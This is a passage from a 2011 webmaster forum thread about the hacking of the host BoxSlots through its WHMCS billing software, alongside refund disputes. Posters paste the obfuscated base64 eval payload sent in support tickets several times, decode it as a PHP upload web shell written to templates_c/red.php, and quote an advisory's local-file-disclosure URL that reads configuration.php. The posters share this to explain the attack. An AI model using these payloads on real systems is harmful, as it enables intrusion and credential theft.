Back to Top
WJunction

Register Now

Welcome Guest!  Register  
Go Back   WJunction - Webmaster Forum > Hosting > Hosting Discussion

Thread Closed
 
Thread Tools Display Modes

Old 7th Dec 2011, 12:16 AM   #41
Member

dark_hunter's Avatar
 
  • My Statistics
Boxslots your doing a good job and at situation at hand, keep it up, and propz for letting people know.
dark_hunter is offline  
Liked by:
Old 7th Dec 2011, 12:18 AM   #42
Banned
 
Website(s):
BoxSlots.com
  • My Statistics
Send a message via Skype™ to rk-boxslots
Quote:
Originally Posted by Th3KiNG View Post
i asked rk and other then they all says NO, so i was about to make a call to paypal(i told them that) then they say kk we are refunding you...

if they so no or not refunding you. call PP fastest you can.

if you used there host for more days then what there TOS says, then don't asked for refund. (i was with them for like less then 24hrs)

Blatant lie, I told you to PM me your email or invoice ID and you would be refunded. Any need for that?
rk-boxslots is offline  
Liked by:
Old 7th Dec 2011, 12:25 AM   #43
Member
 
  • My Statistics
maybe Jamie/nano is behind this anyhow, whmcs isnt the only billing system out there, it is probably the most used one though. clientexec for example is quite good also
itmees is offline  
Old 7th Dec 2011, 12:42 AM   #44
Member
 
Website(s):
xllhost.com
  • My Statistics
Send a message via MSN to Loonycgb2 Send a message via Skype™ to Loonycgb2
Quote:
Originally Posted by dotvps View Post
People have tried to hack my WHMCS all day today. with the same exploit its getting annoying to log in to the ticket: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX 2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw= ='));{/php})
thats a worthless code

Code:
$code = <?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>;
$fo = fopen("templates_c/red.php","w");
fwrite($fo,$code);
Loonycgb2 is offline  
Old 7th Dec 2011, 12:43 AM   #45
Banned
 
Website(s):
dotvps.net
  • My Statistics
@ ^ Read it , php shell into templates_c/red.php
dotvps is offline  
Liked by:
Old 7th Dec 2011, 12:45 AM   #46
Member
 
Website(s):
xllhost.com
  • My Statistics
Send a message via MSN to Loonycgb2 Send a message via Skype™ to Loonycgb2
yeah i know the code but its been patched they are useing a exploit posted by a person named P-Vel0 his code fails it was for anyone who hasnt used the latest patch for whmcs
Loonycgb2 is offline  
Old 7th Dec 2011, 12:47 AM   #47
Banned
 
Website(s):
dotvps.net
  • My Statistics
other tickets:

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX 2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw= ='));{/php})



--------









{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})








-------------



{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ q MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3Blbi gic3RhdHVzL3JlZC5waHAiLCJ3 Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTs='));{/php})











------------------------


{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX 2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw= ='));{/php})
dotvps is offline  
Old 7th Dec 2011, 12:51 AM   #48
Member
 
Website(s):
xllhost.com
  • My Statistics
Send a message via MSN to Loonycgb2 Send a message via Skype™ to Loonycgb2
The first url creates a ticket but if its patched the ticket actually is sent with the php code showing

Boxslot owner read = http://www.wjunction.com/14-news-cur...oit-patch.html

Code:
# Title      : WHMCS (clientarea.php) Local File Disclosure 
# Author     : Red Virus >>>[email protected]
 
# Product    : WHMCS ( WHMCompleteSolution )
# Vendor     : http://whmcs.com/
# Date       : 11/04/2011
# Version    : 3.X.x
# Tested on  : linux+apache
# Homepage   : www.alm3refh.com 
================================================================
 
  
http://localhost/[PATH]/clientarea.php?action=[wrong_value]&templatefile=[LFD]%00
  
http://localhost/[PATH]/clientarea.php?action=red&templatefile=../../configuration.php%00
  
show the page source to see Disclosure file
  
 
================================================================
Loonycgb2 is offline  
Liked by:
Old 7th Dec 2011, 03:27 AM   #49
Banned

CuraHack's Avatar
 
Website(s):
CuraShare.Net CuraShare.Me CuraShare.Info
  • My Statistics
Send a message via MSN to CuraHack Send a message via Skype™ to CuraHack
So now that we know what caused the "hack", was it a known security hole, or is it something unknown for the developers? Thus they hadn't released a patch for it yet?
CuraHack is offline  
Old 7th Dec 2011, 04:17 AM   #50
Member
 
  • My Statistics
@CuraHack,

Developers always get to know about exploits when someone is actually hacked.

When any WHMCS user ( host ) tells them "hey i am hacked" then they see and find the hole.

Then they release the patch and fix it.

simply how are u gonna know that somebody dented ur car when u were inside until somebody tells u.. hey there is a big dent check it out.

WHMCS's new version is a piece of ____ it has many holes.. all of them are fixed now.. also boxslots is taking further prevention to avoid this in future.

so don't worry and stick with them
rohan123 is offline  
Liked by:
Thread Closed

Thread Tools
Display Modes

Similar Threads
Thread Thread Starter Forum Replies Last Post
Boxslots are cool :) srknth Hosting Discussion 6 15th Dec 2011 03:51 PM
BoxSlots - The TRUTH nano. Hosting Discussion 47 4th Dec 2011 09:05 PM
[Discussion] Boxslots - Hacked & What's Going On | viruz99 Hosting Discussion 53 4th Dec 2011 04:37 PM


All times are GMT. The time now is 07:25 AM.